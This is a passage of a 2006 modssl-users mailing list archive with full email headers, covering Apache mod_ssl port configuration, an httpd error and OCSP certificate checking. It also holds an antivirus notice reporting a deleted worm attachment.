> 172.16.15.102 (behind the firewall), on port 8000. Thus I have apache
> listening on port 8000. 
> 
> Any port 443 (https) request sent to the firewall for domain
> www.example.com will be then rerouted to to an internal IP, such as
> 172.16.15.102 (behind the firewall), on port 9000. I want to have
> mod_ssl listening on port 9000, is this possible?
> 
> Should a virtualhost entry just work such  172.16.15.102:9000> and have the usual items such as SSLEngine,
> SSLCertificateFile, SSLCertificateKeyFile, etc?

Yes that should work. Make sure you have your ports in the Listen
directive.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 03:20:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5043C14D9D9; Thu, 12 Oct 2006 03:20:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from py-out-1112.google.com (py-out-1112.google.com [64.233.166.178])
	by master.modssl.org (Postfix) with ESMTP id B27F614D847
	for ; Thu, 12 Oct 2006 03:20:37 +0200 (CEST)
Received: by py-out-1112.google.com with SMTP id b36so508440pyb
        for ; Wed, 11 Oct 2006 18:20:15 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:mime-version:content-type:content-transfer-encoding:content-disposition;
        b=Nko4W/z0D3/zLHiDqM1UyyiUG7hyScuwib+kG6glUZv0zuLIx1xO/Ro3xFjIZPxjvigeLTrbzUk4yRZkIRB0+31gXIO46ft2EVQrURtnTemeDAzccuDxIgpPlEgLLl2jShGDCYQm1/AAcUhUVtVNI+D6g2usgIjn0wTvOS1RTqQ=
Received: by 10.65.138.4 with SMTP id q4mr1758299qbn;
        Wed, 11 Oct 2006 18:20:15 -0700 (PDT)
Received: by 10.65.122.13 with HTTP; Wed, 11 Oct 2006 18:20:15 -0700 (PDT)
Message-ID: <42f348a50610111820s319104d8vd755b709582735bc@mail.gmail.com>
Date: Wed, 11 Oct 2006 20:20:15 -0500
From: "Brian Sieler" 
To: modssl-users@modssl.org
Subject: SSL/httpd 
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Brian Sieler" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Using apache 2.2.x. Installed--works fine for http only. Soon as -DSSL
is added to startup the following happens.

httpd processes get continously created then show as  then go away.

error_log shows many lines of:

[error] (38)Function not implemented: apr_pollset_poll: (listen)

Similar SSL setup works fine on other servers.

Clues anyone?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 10:14:38 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E786B14D9DF; Thu, 12 Oct 2006 10:14:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187])
	by master.modssl.org (Postfix) with ESMTP id AB02014D847
	for ; Thu, 12 Oct 2006 10:14:38 +0200 (CEST)
Received: by nf-out-0910.google.com with SMTP id c31so991286nfb
        for ; Thu, 12 Oct 2006 01:14:26 -0700 (PDT)
DomainKey-Signature: a=rsa-sha1; q=dns; c=nofws;
        s=beta; d=gmail.com;
        h=received:message-id:date:from:to:subject:in-reply-to:mime-version:content-type:content-transfer-encoding:content-disposition:references;
        b=MSKb4Y1OJBleHtqbx2EbKJkRFwVaQCaRTKeICNfBGkAoEqx8OlfnbMstAO5ygGosMKQpdCF+dIghpqIELY4Ua61nxbfHObKl9SD55rNzf8VCbOh60gaLwZE9lpjKSzYOzeIHAXaJ+n5vqHB6i3q4nw03n29s6cnIuWhHj2STq7s=
Received: by 10.48.210.20 with SMTP id i20mr4666170nfg;
        Thu, 12 Oct 2006 01:14:26 -0700 (PDT)
Received: by 10.49.34.15 with HTTP; Thu, 12 Oct 2006 01:14:26 -0700 (PDT)
Message-ID: 
Date: Thu, 12 Oct 2006 10:14:26 +0200
From: "=?ISO-8859-1?Q?Fran=E7ois_Soumillion?=" 
To: modssl-users@modssl.org
Subject: Re: OCSP? (UNCLASSIFIED)
In-Reply-To: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7E0C4@emswhl1.pac.disa.mil>
MIME-Version: 1.0
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
References: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7E0C4@emswhl1.pac.disa.mil>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "=?ISO-8859-1?Q?Fran=E7ois_Soumillion?=" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://www.belgium.be/zip/eid_authentication_proxy_fr.html

You will find there an updated version of mod-ssl including OCSP check
as well as the documentation to set it up.

2006/10/11, Victor, Dwight P CTR DISA PAC :
> Classification:  UNCLASSIFIED
> Caveats: NONE
>
> Hi Eriks,
>
> Thanks for the tip regarding Tumbleweed & WebCullis.  I'll definitely have
> to do some research.
>
> Paul,
>
> One of my web searches pulled up the fact that HP-UX has a OCSP enabled
> version of mod_ssl.  Seems to be a lucky break for you.  Hope that works
> out.
>
> I have experienced a large memory hit anytime certificate checking is
> performed against the CRLs (some of which are 13 MB in size) in the range of
> 75MB per Apache server instance.  Luckily we aren't that busy, or we would
> definitely be feeling the pain.
>
> BTW, I've been reading a bit about mod_nss
> (http://directory.fedora.redhat.com/wiki/Mod_nss).  This module sounds
> interesting, but it isn't supported on HP-UX.  I'll have to give it a try
> and I'll let the list know the results (if I can find some time to play with
> it).
> Thanks again,
>
> Dwight...
>
> ---
> Dwight Victor, CISSP (Contractor)
> EMAIL: dwight.victor.ctr@disa.mil
> SMAIL: victord@pac.disa.smil.mil
> TEL:   (808) 653-3677 ext 229
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]
> Sent: Wednesday, October 11, 2006 10:55 AM
> To: modssl-users@modssl.org
> Subject: RE: OCSP? (UNCLASSIFIED)
>
>
> Thanks Eriks, appreciate the info. We are using HP-UX, so the Tumbleweed
> solution won't work for us. We do have an HP version of Apache that has the
> OCSP mod of mod_ssl, but we just installed it (today) and haven't had a
> chance to look at the documentation yet. Will post back and let you know
> what we found out. Thanks again.
>
> Paul
>
>
> Richters, Eriks A wrote:
> >
> > I went down this road a few months ago.  Someone wrote a patch that
> > would add OCSP client functionality to Apache, but the patch never got
> > folded into the Apache mainline code.  We spent a bit of effort trying
> > to get the patch to work with our version of Apache with no luck.
> > There are two products from commercial organizations out there that
> > can help.  One is from Tumbleweed, called Server Validator.  It's
> > pricey about $2000 per server, but works pretty well. Its very easy to
> > install and configure and has some nice features for supporting OCSP
> > and failing over to CRLs.  It is supported on several platforms.
> > The other product is called WebCullis from the organization that used
> > to be Orion Security. (Orion Security has since been bought by
> > Entrust.) It used to be under the GPL, which was nice.  At the time,
> > they only had a version for Windows and Intel based Solaris.
> > I hope this helps.
> >
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org] On Behalf Of pbains
> > Sent: Wednesday, October 11, 2006 4:32 PM
> > To: modssl-users@modssl.org
> > Subject: Re: OCSP? (UNCLASSIFIED)
> >
> >
> > My organization is headed down this road after experiencing
> > performance degradation from checking large CRLs. As we come up with a
> > solution, will post what I find out. Alternatively, if you have any
> > information, would appreciate it, thanks!
> >
> > Paul
> >
> >
> > Victor, Dwight P CTR DISA PAC wrote:
> >>
> >> Classification:  UNCLASSIFIED
> >> Caveats: NONE
> >>
> >>
> >> Hello List!
> >>
> >> Has anyone had any experience/success with using mod_ssl + Apache v2
> > to
> >> query an OCSP responder regarding the status of an end-user provided
> >> certificate and allow/deny access based on the response?  Any tips,
> >> suggestions, discussion would be appreciated.
> >>
> >> Best Regards,
> >>
> >> Dwight...
> >>
> >> ---
> >> Dwight Victor, CISSP (Contractor)
> >> Systems Administrator / Webmaster
> >> General Dynamics C4 Systems
> >> EMAIL: dwight.victor.ctr@disa.mil
> >> TEL:   (808) 653-3677 ext 229
> >>
> >> Classification:  UNCLASSIFIED
> >> Caveats: NONE
> >>
> >>
> >>
> >>
> >
> > --
> > View this message in context:
> > http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764147
> > Sent from the mod_ssl - Users mailing list archive at Nabble.com.
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> >
> >
>
> --
> View this message in context:
> http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764600
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> Classification:  UNCLASSIFIED
> Caveats: NONE
>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 10:50:52 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id CE60E14D9DF; Thu, 12 Oct 2006 10:50:52 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from modssl.org (wcoe-98.r-195-35-225.essentkabel.com [195.35.225.98])
	by master.modssl.org (Postfix) with ESMTP id 1D0A114D847
	for ; Thu, 12 Oct 2006 10:50:52 +0200 (CEST)
From: rse@engelschall.com
To: modssl-users@modssl.org
Subject: =?utf-8?Q?[Spam]_-_?=Mail Delivery (failure modssl-users@modssl.org)
Date: Thu, 12 Oct 2006 11:02:53 +0200
MIME-Version: 1.0
Content-Type: multipart/mixed;
	boundary="a----=_NextPart_000_001B_01C0CA80.6B015D10"
X-Priority: 3
X-MSMail-Priority: Normal
X-GateDefender-Antispam: spam (score=96)
Message-Id: <20061012085052.1D0A114D847@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--a----=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/alternative; boundary=GDalert_boundary_980747

--GDalert_boundary_980747
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: message.scr
W32/Netsky.P.worm

The file has been deleted to protect the network.
12/10/2006 10:49:57 [GMT+0200]

www.pandasoftware.com

+----------------------------------------------------+

--GDalert_boundary_980747
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: quoted-printable





+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (FakefromWorm) in the following file: message.scr
W32/Netsky.P.worm

The file has been deleted to protect the network.
12/10/2006 10:49:57 [GMT+0200]

www.pandasoftware.com

+----------------------------------------------------+





--GDalert_boundary_980747--


--a----=_NextPart_000_001B_01C0CA80.6B015D10
Content-Type: multipart/mixed;
	boundary="a----=_NextPart_000_001B_01C0CA80.6B015D10"

80.6B015D10
Content-Type: multipart/alternative; boundary=GDalert_boundary_980598

--GDalert_boundary_980598
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 7bit

+----------------------------------------------------+

Panda GateDefender Performa has detected malicious content (HackTool) in the following file: message_attachment3
Exploit/iFrame

The file has been deleted to protect
--a----=_NextPart_000_001B_01C0CA80.6B015D10--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 20:01:13 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id B928214D9E0; Thu, 12 Oct 2006 20:01:13 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mtawhl2.disanet.disa-u.mil (mtawhl2.pac.disa.mil [198.22.28.4])
	by master.modssl.org (Postfix) with ESMTP id 35A5F14D847
	for ; Thu, 12 Oct 2006 20:01:08 +0200 (CEST)
Received: by mtawhl2.pac.disa.mil with Internet Mail Service (5.5.2657.72)
	id <4XFVTQ3S>; Thu, 12 Oct 2006 08:00:55 -1000
Message-ID: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7E0C9@emswhl1.pac.disa.mil>
From: "Victor, Dwight P CTR DISA PAC" 
To: "'modssl-users@modssl.org'" 
Subject: RE: OCSP? (UNCLASSIFIED)
Date: Thu, 12 Oct 2006 08:00:51 -1000
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2657.72)
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Victor, Dwight P CTR DISA PAC" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Classification:  UNCLASSIFIED=20
Caveats: NONE


Thank you Fran=E7ois!

---
Dwight Victor, CISSP (Contractor)
TEL:   (808) 653-3677 ext 229

-----Original Message-----
From: owner-modssl-users@modssl.org =
[mailto:owner-modssl-users@modssl.org]=20
Sent: Wednesday, October 11, 2006 10:14 PM
To: modssl-users@modssl.org
Subject: Re: OCSP? (UNCLASSIFIED)

http://www.belgium.be/zip/eid_authentication_proxy_fr.html

You will find there an updated version of mod-ssl including OCSP check =
as
well as the documentation to set it up.

2006/10/11, Victor, Dwight P CTR DISA PAC :
> Classification:  UNCLASSIFIED
> Caveats: NONE
>
> Hi Eriks,
>
> Thanks for the tip regarding Tumbleweed & WebCullis.  I'll definitely =

> have to do some research.
>
> Paul,
>
> One of my web searches pulled up the fact that HP-UX has a OCSP=20
> enabled version of mod_ssl.  Seems to be a lucky break for you.  Hope =

> that works out.
>
> I have experienced a large memory hit anytime certificate checking is =

> performed against the CRLs (some of which are 13 MB in size) in the=20
> range of 75MB per Apache server instance.  Luckily we aren't that=20
> busy, or we would definitely be feeling the pain.
>
> BTW, I've been reading a bit about mod_nss=20
> (http://directory.fedora.redhat.com/wiki/Mod_nss).  This module =
sounds=20
> interesting, but it isn't supported on HP-UX.  I'll have to give it a =

> try and I'll let the list know the results (if I can find some time =
to=20
> play with it).
> Thanks again,
>
> Dwight...
>
> ---
> Dwight Victor, CISSP (Contractor)
> EMAIL: dwight.victor.ctr@disa.mil
> SMAIL: victord@pac.disa.smil.mil
> TEL:   (808) 653-3677 ext 229
>
> -----Original Message-----
> From: owner-modssl-users@modssl.org=20
> [mailto:owner-modssl-users@modssl.org]
> Sent: Wednesday, October 11, 2006 10:55 AM
> To: modssl-users@modssl.org
> Subject: RE: OCSP? (UNCLASSIFIED)
>
>
> Thanks Eriks, appreciate the info. We are using HP-UX, so the=20
> Tumbleweed solution won't work for us. We do have an HP version of=20
> Apache that has the OCSP mod of mod_ssl, but we just installed it=20
> (today) and haven't had a chance to look at the documentation yet.=20
> Will post back and let you know what we found out. Thanks again.
>
> Paul
>
>
> Richters, Eriks A wrote:
> >
> > I went down this road a few months ago.  Someone wrote a patch that =

> > would add OCSP client functionality to Apache, but the patch never=20
> > got folded into the Apache mainline code.  We spent a bit of effort =

> > trying to get the patch to work with our version of Apache with no =
luck.
> > There are two products from commercial organizations out there that =

> > can help.  One is from Tumbleweed, called Server Validator.  It's=20
> > pricey about $2000 per server, but works pretty well. Its very easy =

> > to install and configure and has some nice features for supporting=20
> > OCSP and failing over to CRLs.  It is supported on several =
platforms.
> > The other product is called WebCullis from the organization that=20
> > used to be Orion Security. (Orion Security has since been bought by
> > Entrust.) It used to be under the GPL, which was nice.  At the =
time,=20
> > they only had a version for Windows and Intel based Solaris.
> > I hope this helps.
> >
> > -----Original Message-----
> > From: owner-modssl-users@modssl.org
> > [mailto:owner-modssl-users@modssl.org] On Behalf Of pbains
> > Sent: Wednesday, October 11, 2006 4:32 PM
> > To: modssl-users@modssl.org
> > Subject: Re: OCSP? (UNCLASSIFIED)
> >
> >
> > My organization is headed down this road after experiencing=20
> > performance degradation from checking large CRLs. As we come up =
with=20
> > a solution, will post what I find out. Alternatively, if you have=20
> > any information, would appreciate it, thanks!
> >
> > Paul
> >
> >
> > Victor, Dwight P CTR DISA PAC wrote:
> >>
> >> Classification:  UNCLASSIFIED
> >> Caveats: NONE
> >>
> >>
> >> Hello List!
> >>
> >> Has anyone had any experience/success with using mod_ssl + Apache=20
> >> v2
> > to
> >> query an OCSP responder regarding the status of an end-user=20
> >> provided certificate and allow/deny access based on the response?  =

> >> Any tips, suggestions, discussion would be appreciated.
> >>
> >> Best Regards,
> >>
> >> Dwight...
> >>
> >> ---
> >> Dwight Victor, CISSP (Contractor)
> >> Systems Administrator / Webmaster
> >> General Dynamics C4 Systems
> >> EMAIL: dwight.victor.ctr@disa.mil
> >> TEL:   (808) 653-3677 ext 229
> >>
> >> Classification:  UNCLASSIFIED
> >> Caveats: NONE
> >>
> >>
> >>
> >>
> >
> > --
> > View this message in context:
> > =
http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a67641
> > 47 Sent from the mod_ssl - Users mailing list archive at =
Nabble.com.
> >
> > =
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> > User Support Mailing List                      =
modssl-users@modssl.org
> > Automated List Manager                            =
majordomo@modssl.org
> >
> > =
______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> > User Support Mailing List                      =
modssl-users@modssl.org
> > Automated List Manager                            =
majordomo@modssl.org
> >
> >
>
> --
> View this message in context:
> =
http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764600
> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>
> =
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> User Support Mailing List                      =
modssl-users@modssl.org
> Automated List Manager                            =
majordomo@modssl.org
> Classification:  UNCLASSIFIED
> Caveats: NONE
>
> =
______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   =
www.modssl.org
> User Support Mailing List                      =
modssl-users@modssl.org
> Automated List Manager                            =
majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org
Classification:  UNCLASSIFIED=20
Caveats: NONE

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Oct 12 21:44:04 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4F8D014D9DA; Thu, 12 Oct 2006 21:44:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from talk.nabble.com (www.nabble.com [72.21.53.35])
	by master.modssl.org (Postfix) with ESMTP id BBCC414D844
	for ; Thu, 12 Oct 2006 21:43:59 +0200 (CEST)
Received: from [72.21.53.38] (helo=jubjub.nabble.com)
	by talk.nabble.com with esmtp (Exim 4.50)
	id 1GY6T4-0003Iz-Ka
	for modssl-users@modssl.org; Thu, 12 Oct 2006 12:43:46 -0700
Message-ID: <6783252.post@talk.nabble.com>
Date: Thu, 12 Oct 2006 12:43:46 -0700 (PDT)
From: pbains 
To: modssl-users@modssl.org
Subject: Re: OCSP? (UNCLASSIFIED)
In-Reply-To: 
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable
X-Nabble-From: paul.opensource@gmail.com
References: <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7DEA3@emswhl1.pac.disa.mil> <6764147.post@talk.nabble.com> <2629CC4E1D22A64593B02C43E8555303014E8133@USILMS12.ca.com> <6764600.post@talk.nabble.com> <8B3BECEEF7677D4F96CC9C9E2AB9DE7D02B7E0C4@emswhl1.pac.disa.mil> 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: pbains 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Thank you Fran=C3=A7ois! After reading the documentation and looking at the=
 Apache
developer's notes, I am still not clear on how to specify an OCSP responder
if the responder URI is not included in the responder's certificate. From
the Apache developer's notes, I think it is via a configuration option in
ssl.conf, but I have not seen an example, only misc notes. Does anyone know
how to do this? We would like to be able to specify a specific responder if
the URI is not contained in the server's cert. Thanks in advance.

Paul


Fran=C3=A7ois Soumillion wrote:
>=20
> http://www.belgium.be/zip/eid_authentication_proxy_fr.html
>=20
> You will find there an updated version of mod-ssl including OCSP check
> as well as the documentation to set it up.
>=20
> 2006/10/11, Victor, Dwight P CTR DISA PAC :
>> Classification:  UNCLASSIFIED
>> Caveats: NONE
>>
>> Hi Eriks,
>>
>> Thanks for the tip regarding Tumbleweed & WebCullis.  I'll definitely
>> have
>> to do some research.
>>
>> Paul,
>>
>> One of my web searches pulled up the fact that HP-UX has a OCSP enabled
>> version of mod_ssl.  Seems to be a lucky break for you.  Hope that works
>> out.
>>
>> I have experienced a large memory hit anytime certificate checking is
>> performed against the CRLs (some of which are 13 MB in size) in the rang=
e
>> of
>> 75MB per Apache server instance.  Luckily we aren't that busy, or we
>> would
>> definitely be feeling the pain.
>>
>> BTW, I've been reading a bit about mod_nss
>> (http://directory.fedora.redhat.com/wiki/Mod_nss).  This module sounds
>> interesting, but it isn't supported on HP-UX.  I'll have to give it a tr=
y
>> and I'll let the list know the results (if I can find some time to play
>> with
>> it).
>> Thanks again,
>>
>> Dwight...
>>
>> ---
>> Dwight Victor, CISSP (Contractor)
>> EMAIL: dwight.victor.ctr@disa.mil
>> SMAIL: victord@pac.disa.smil.mil
>> TEL:   (808) 653-3677 ext 229
>>
>> -----Original Message-----
>> From: owner-modssl-users@modssl.org
>> [mailto:owner-modssl-users@modssl.org]
>> Sent: Wednesday, October 11, 2006 10:55 AM
>> To: modssl-users@modssl.org
>> Subject: RE: OCSP? (UNCLASSIFIED)
>>
>>
>> Thanks Eriks, appreciate the info. We are using HP-UX, so the Tumbleweed
>> solution won't work for us. We do have an HP version of Apache that has
>> the
>> OCSP mod of mod_ssl, but we just installed it (today) and haven't had a
>> chance to look at the documentation yet. Will post back and let you know
>> what we found out. Thanks again.
>>
>> Paul
>>
>>
>> Richters, Eriks A wrote:
>> >
>> > I went down this road a few months ago.  Someone wrote a patch that
>> > would add OCSP client functionality to Apache, but the patch never got
>> > folded into the Apache mainline code.  We spent a bit of effort trying
>> > to get the patch to work with our version of Apache with no luck.
>> > There are two products from commercial organizations out there that
>> > can help.  One is from Tumbleweed, called Server Validator.  It's
>> > pricey about $2000 per server, but works pretty well. Its very easy to
>> > install and configure and has some nice features for supporting OCSP
>> > and failing over to CRLs.  It is supported on several platforms.
>> > The other product is called WebCullis from the organization that used
>> > to be Orion Security. (Orion Security has since been bought by
>> > Entrust.) It used to be under the GPL, which was nice.  At the time,
>> > they only had a version for Windows and Intel based Solaris.
>> > I hope this helps.
>> >
>> > -----Original Message-----
>> > From: owner-modssl-users@modssl.org
>> > [mailto:owner-modssl-users@modssl.org] On Behalf Of pbains
>> > Sent: Wednesday, October 11, 2006 4:32 PM
>> > To: modssl-users@modssl.org
>> > Subject: Re: OCSP? (UNCLASSIFIED)
>> >
>> >
>> > My organization is headed down this road after experiencing
>> > performance degradation from checking large CRLs. As we come up with a
>> > solution, will post what I find out. Alternatively, if you have any
>> > information, would appreciate it, thanks!
>> >
>> > Paul
>> >
>> >
>> > Victor, Dwight P CTR DISA PAC wrote:
>> >>
>> >> Classification:  UNCLASSIFIED
>> >> Caveats: NONE
>> >>
>> >>
>> >> Hello List!
>> >>
>> >> Has anyone had any experience/success with using mod_ssl + Apache v2
>> > to
>> >> query an OCSP responder regarding the status of an end-user provided
>> >> certificate and allow/deny access based on the response?  Any tips,
>> >> suggestions, discussion would be appreciated.
>> >>
>> >> Best Regards,
>> >>
>> >> Dwight...
>> >>
>> >> ---
>> >> Dwight Victor, CISSP (Contractor)
>> >> Systems Administrator / Webmaster
>> >> General Dynamics C4 Systems
>> >> EMAIL: dwight.victor.ctr@disa.mil
>> >> TEL:   (808) 653-3677 ext 229
>> >>
>> >> Classification:  UNCLASSIFIED
>> >> Caveats: NONE
>> >>
>> >>
>> >>
>> >>
>> >
>> > --
>> > View this message in context:
>> > http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764147
>> > Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>> >
>> > ______________________________________________________________________
>> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> > User Support Mailing List                      modssl-users@modssl.org
>> > Automated List Manager                            majordomo@modssl.org
>> >
>> > ______________________________________________________________________
>> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> > User Support Mailing List                      modssl-users@modssl.org
>> > Automated List Manager                            majordomo@modssl.org
>> >
>> >
>>
>> --
>> View this message in context:
>> http://www.nabble.com/OCSP--%28UNCLASSIFIED%29-tf1638361.html#a6764600
>> Sent from the mod_ssl - Users mailing list archive at Nabble.com.
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>> Classification:  UNCLASSIFIED
>> Caveats: NONE
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>>
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
>=20
>=20

--=20
View this message in context: http://www.nabble.com/OCSP--%28UNCLASSIFIED%2=
9-tf1638361.html#a6783252
Sent from the mod_ssl - Users mailing list archive at Nabble.com.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 13 00:12:04 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 235AA14D84D; Fri, 13 Oct 2006 00:12:04 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from glatton.cnchost.com (glatton.cnchost.com [207.155.248.47])
	by master.modssl.org (Postfix) with ESMTP id BE0A314D82B
	for ; Fri, 13 Oct 2006 00:12:03 +0200 (CEST)
Received: from [172.27.173.134] (unknown [66.194.95.2])
	(as wrowe@rowe-clan.net)
	by glatton.cnchost.com (ConcentricHost(2.54) Relay) with ESMTP id 75AB52CF90D
	for ; Thu, 12 Oct 2006 18:11:49 -0400 (EDT)
Message-ID: <452EBDA1.8020806@rowe-clan.net>
Date: Thu, 12 Oct 2006 17:11:45 -0500
From: "William A. Rowe, Jr." 
User-Agent: Thunderbird 1.5.0.7 (X11/20060913)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: SSL/httpd 
References: <42f348a50610111820s319104d8vd755b709582735bc@mail.gmail.com>
In-Reply-To: <42f348a50610111820s319104d8vd755b709582735bc@mail.gmail.com>
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "William A. Rowe, Jr." 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Brian Sieler wrote:
> Using apache 2.2.x.

Because mod_ssl in Apache 2.0 & 2.2 is maintained by the httpd project
(with some good collaboration that moves fixes from that ASF flavor to
the mod_ssl project and back, when applicable)...

you might have meant to ask this question of users@httpd.apache.org?
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 13 14:12:05 2006
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
